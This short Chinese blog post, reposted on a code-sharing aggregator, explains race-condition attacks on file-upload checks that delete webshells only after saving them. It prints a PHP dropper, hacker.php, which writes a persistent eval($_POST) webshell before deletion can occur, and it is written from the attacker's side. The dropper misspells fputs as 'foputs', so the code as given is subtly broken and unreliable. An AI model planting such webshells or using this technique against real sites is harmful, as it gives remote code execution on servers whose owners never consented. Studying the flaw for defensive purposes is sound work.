码迷,mamicode.com
首页 > 其他好文 > 详细

竞争条件攻击

时间:2020-02-11 19:18:30      阅读:96      评论:0      收藏:0      [点我收藏+]

标签:pre   文件上传漏洞   文件的时间   fopen   val   col   style   脚本   目录   

竞争条件攻击属于文件上传漏洞的一种。

一些网站上传文件的逻辑是先允许上传文件,再检测文件中是否包含webshell的脚本,如果存在则删除webshell文件。

 

但是攻击者可以利用上传文件和删除文件的时间差来完成文件上传漏洞攻击。

攻击者可以上传类似代码hacker.php:

<?php
  foputs(fopen(‘../shell.php‘,‘w‘),‘<?php @eval($_POST[a]) ?>‘);
?>

访问文件时,文件代码会执行,在hacker.php文件所在目录下新建一个shell.php,内容即:

<?php @eval($_POST[a]) ?>

旧的webshell文件本来就只是一个垫脚石的存在,删不删除无所谓,我们利用新建的webshell文件可以进行漏洞攻击

 

竞争条件攻击只试用于绕过后端的检测,对于绕过前端代码检测方法是没有用的。

如果攻击者能讲两者很好得结合起来,说不定会有成效。

竞争条件攻击

标签:pre   文件上传漏洞   文件的时间   fopen   val   col   style   脚本   目录   

原文地址:https://www.cnblogs.com/echoDetected/p/12296235.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!